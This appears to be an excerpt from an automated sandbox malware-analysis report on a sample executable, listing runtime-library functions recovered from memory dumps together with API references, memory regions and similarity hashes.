                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 1170836740-1018135373
                                                      • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                      • Instruction ID: 3b4537d877df667a26a5f7af8fbb8c140355993206fc9854477fa74853602e25
                                                      • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                      • Instruction Fuzzy Hash: 5E41E634A003089BDF10DF69C844A9FBBB1EF45318F14806AEC156B3D2C7399A65CBDA
                                                      Function 04CC9FE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 04CCA017
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 04CCA01F
                                                      • _ValidateLocalCookies.LIBCMT ref: 04CCA0A8
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 04CCA0D3
                                                      • _ValidateLocalCookies.LIBCMT ref: 04CCA128
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 1170836740-1018135373
                                                      • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                      • Instruction ID: 363a7727060e39815ae6d6e620603a170479c99d6151c544957c65e997adbd27
                                                      • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                      • Instruction Fuzzy Hash: AF41E434A0020CEFCF10DF68D888B9EBBB6AF45368F148159E815AB351D737BA55CB91
                                                      Function 10003A20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                                      • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                                      • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 1170836740-1018135373
                                                      • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                      • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                                      • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                      • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                                      Function 0041611C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: C:\Users\user\Desktop\tXEKP1ThBP.exe$obA
                                                      • API String ID: 0-1226716261
                                                      • Opcode ID: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
                                                      • Instruction ID: d8f7faa714452712b8dd2e2ad71d7e848a624b740a48fc3c62d8856f0a647b07
                                                      • Opcode Fuzzy Hash: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
                                                      • Instruction Fuzzy Hash: E321F971600219BFDB20AF668C81DAB776DEF00368712863BFD15D7291D738ED8187A8
                                                      Function 00411B4A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: api-ms-$ext-ms-
                                                      • API String ID: 0-537541572
                                                      • Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                      • Instruction ID: 9472c79033c58d28bd5fab4bb402529842eae37fc53cf50cf89856cde478e707
                                                      • Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                      • Instruction Fuzzy Hash: 1F21D571E09221ABCB218B259C44BDB3758AF017A4F254527EE06A73A0F63CFC41C6E8
                                                      Function 100072FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: api-ms-$ext-ms-
                                                      • API String ID: 0-537541572
                                                      • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                      • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                                      • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                      • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                                      Function 00417082 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0041704A: _free.LIBCMT ref: 0041706F
                                                      • _free.LIBCMT ref: 004170D0
                                                        • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                        • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                      • _free.LIBCMT ref: 004170DB
                                                      • _free.LIBCMT ref: 004170E6
                                                      • _free.LIBCMT ref: 0041713A
                                                      • _free.LIBCMT ref: 00417145
                                                      • _free.LIBCMT ref: 00417150
                                                      • _free.LIBCMT ref: 0041715B
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
                                                      • Instruction ID: 17f1ba636a3ac0ac971b1a3f484e478362915a153c89e36741bf365215ef3bb6
                                                      • Opcode Fuzzy Hash: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
                                                      • Instruction Fuzzy Hash: 9C118EB2585744B6D520B772CC06FCB7BEC6F48304F40481FB69E66063EA2CAAC04645
                                                      Function 04CD6482 Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                      • Instruction ID: 73758c83bacc75c87993d64624cf19aca49fde56cebf820d008ca83c5333ec01
                                                      • Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                      • Instruction Fuzzy Hash: 6F115E72742B04AAF620FBB1CC06FCB779EAF0470CF44481DA79AA6051DAB9B944E751
                                                      Function 1000C5BF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 1000C587: _free.LIBCMT ref: 1000C5AC
                                                      • _free.LIBCMT ref: 1000C60D
                                                        • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                        • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                      • _free.LIBCMT ref: 1000C618
                                                      • _free.LIBCMT ref: 1000C623
                                                      • _free.LIBCMT ref: 1000C677
                                                      • _free.LIBCMT ref: 1000C682
                                                      • _free.LIBCMT ref: 1000C68D
                                                      • _free.LIBCMT ref: 1000C698
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                                      • Instruction ID: 1780f257e170a803287b818d598211b5e25d48ac92953e35ea001cf34306b7c8
                                                      • Opcode Fuzzy Hash: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                                      • Instruction Fuzzy Hash: 25115479940B08AAF520EB70CC47FCF7B9CEF457C1F400819B29D76097DA75B6484AA1
                                                      Function 04B272E9 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 04B272B1: _free.LIBCMT ref: 04B272D6
                                                      • _free.LIBCMT ref: 04B27337
                                                        • Part of subcall function 04B21D29: HeapFree.KERNEL32(00000000,00000000,?,04B272DB,?,00000000,?,?,?,04B27302,?,00000007,?,?,04B275E1,?), ref: 04B21D3F
                                                        • Part of subcall function 04B21D29: GetLastError.KERNEL32(?,?,04B272DB,?,00000000,?,?,?,04B27302,?,00000007,?,?,04B275E1,?,?), ref: 04B21D51
                                                      • _free.LIBCMT ref: 04B27342
                                                      • _free.LIBCMT ref: 04B2734D
                                                      • _free.LIBCMT ref: 04B273A1
                                                      • _free.LIBCMT ref: 04B273AC
                                                      • _free.LIBCMT ref: 04B273B7
                                                      • _free.LIBCMT ref: 04B273C2
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                      • Instruction ID: 73b4608c0514d83ce56a49cb7726285cc8cfbfdb19abcb5099facfe534a8f6c0
                                                      • Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                      • Instruction Fuzzy Hash: F3118E31540B38FAEA20BBB0CE05FCB779CEF06704F400858F2ADB6051DE65B5149764
                                                      Function 00417CD3 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(00000020,00000000,00000000), ref: 00417D1B
                                                      • __fassign.LIBCMT ref: 00417EFA
                                                      • __fassign.LIBCMT ref: 00417F17
                                                      • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00417F5F
                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00417F9F
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041804B
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ConsoleErrorLast
                                                      • String ID:
                                                      • API String ID: 4031098158-0
                                                      • Opcode ID: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
                                                      • Instruction ID: bf6bde338aaa4c5312f696cbfa7b8c1c2da82e764b9ff6896d8d464e3c4a4b13
                                                      • Opcode Fuzzy Hash: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
                                                      • Instruction Fuzzy Hash: 13D19C71E042589FCF15CFA8C9809EEBBB5FF49314F29006AE815BB341D735A986CB58
                                                      Function 04B27F3A Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(00000000,00000000,00000000), ref: 04B27F82
                                                      • __fassign.LIBCMT ref: 04B28161
                                                      • __fassign.LIBCMT ref: 04B2817E
                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B281C6
                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04B28206
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B282B2
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ConsoleErrorLast
                                                      • String ID:
                                                      • API String ID: 4031098158-0
                                                      • Opcode ID: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
                                                      • Instruction ID: 05cd2e39f01964577f37a165e39f472291baffdcb2de68dd42d01be771e65f2e
                                                      • Opcode Fuzzy Hash: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
                                                      • Instruction Fuzzy Hash: 4DD1CC71E016689FCF15DFE8C9809EDBBB5FF48304F2802A9E819BB251D731A942CB50
                                                      Function 1000B6D8 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                                      • __fassign.LIBCMT ref: 1000B905
                                                      • __fassign.LIBCMT ref: 1000B922
                                                      • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                      • String ID:
                                                      • API String ID: 1735259414-0
                                                      • Opcode ID: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                                      • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                                      • Opcode Fuzzy Hash: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                                      • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                                      Function 0040ADA4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,0040AD9B,0040A35F,00409999), ref: 0040ADB2
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040ADC0
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040ADD9
                                                      • SetLastError.KERNEL32(00000000,0040AD9B,0040A35F,00409999), ref: 0040AE2B
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                      • Instruction ID: f4b61bc4878066cd9e5532c4ff7823403916b0aca9ffed94e046062e6da044f3
                                                      • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                      • Instruction Fuzzy Hash: 6201D8722493125FE6342A76BC459572A54EB51779720033FF910B71E2EF3D4C32558E
                                                      Function 10003DFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                                      • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                      • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
                                                      • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                      • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                                      Function 04B1B00B Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,04B1B002,04B1A5C6,04B19C00), ref: 04B1B019
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04B1B027
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04B1B040
                                                      • SetLastError.KERNEL32(00000000,04B1B002,04B1A5C6,04B19C00), ref: 04B1B092
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                      • Instruction ID: 5e1baabeaa79e25ac82768a49aac8b7bedc2c59851ee74960390ccfa60fdc6d4
                                                      • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                      • Instruction Fuzzy Hash: 1501FC7274D311AFBB346FB57C8C9662B54EB012787A002B9F524960F0EF1978125144
                                                      Function 00415B18 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _free_strpbrk
                                                      • String ID: *?
                                                      • API String ID: 3300345361-2564092906
                                                      • Opcode ID: 0b6f9c8e298a88ef6bfcf1d60ea57791d65df11c988ce29e8962c90e9ece18a3
                                                      • Instruction ID: 08919aac2af5baaa0bc26bb502442345b411eba09a4371073371dd33b5eb5490
                                                      • Opcode Fuzzy Hash: 0b6f9c8e298a88ef6bfcf1d60ea57791d65df11c988ce29e8962c90e9ece18a3
                                                      • Instruction Fuzzy Hash: 34613F75E00619DFCB14CFA9C8815EEFBF5EF88354B24816AE815F7300E675AE818B94
                                                      Function 04CD4F18 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _free_strpbrk
                                                      • String ID: *?
                                                      • API String ID: 3300345361-2564092906
                                                      • Opcode ID: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                                      • Instruction ID: e676cb9d25663c295232b49827b356f6b3a08106bc7054659ffbb09f8bf9ee0c
                                                      • Opcode Fuzzy Hash: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                                      • Instruction Fuzzy Hash: 37613EB5E00219AFDB14CFA9C8809EDFBF6EF48314B158169D955E7300E771BE418B90
                                                      Function 04B25D7F Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free_strpbrk
                                                      • String ID: *?
                                                      • API String ID: 3300345361-2564092906
                                                      • Opcode ID: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                                      • Instruction ID: 674c49d4034198f47d91eb6bb6ec866c543008c656aa883431a832638c97f1d8
                                                      • Opcode Fuzzy Hash: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                                      • Instruction Fuzzy Hash: 6B614E75E00229AFDF24DFA8C9805EDFBF5FF48314B1485A9E819E7340E631AE418B90
                                                      Function 10008336 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • C:\Users\user\Desktop\tXEKP1ThBP.exe, xrefs: 1000833B
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: C:\Users\user\Desktop\tXEKP1ThBP.exe
                                                      • API String ID: 0-848213333
                                                      • Opcode ID: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                                      • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                                      • Opcode Fuzzy Hash: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                                      • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                                      Function 04B26383 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • C:\Users\user\Desktop\tXEKP1ThBP.exe, xrefs: 04B26388
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: C:\Users\user\Desktop\tXEKP1ThBP.exe
                                                      • API String ID: 0-848213333
                                                      • Opcode ID: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
                                                      • Instruction ID: f47fba04cd15e55e8c9ead570a7b42143e5c02853cd9983b0c9411ec2bae3225
                                                      • Opcode Fuzzy Hash: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
                                                      • Instruction Fuzzy Hash: 92210871600525BFEB20AF798E81C7B77ADEF002A87108694F96EC7160E731FC0187A1
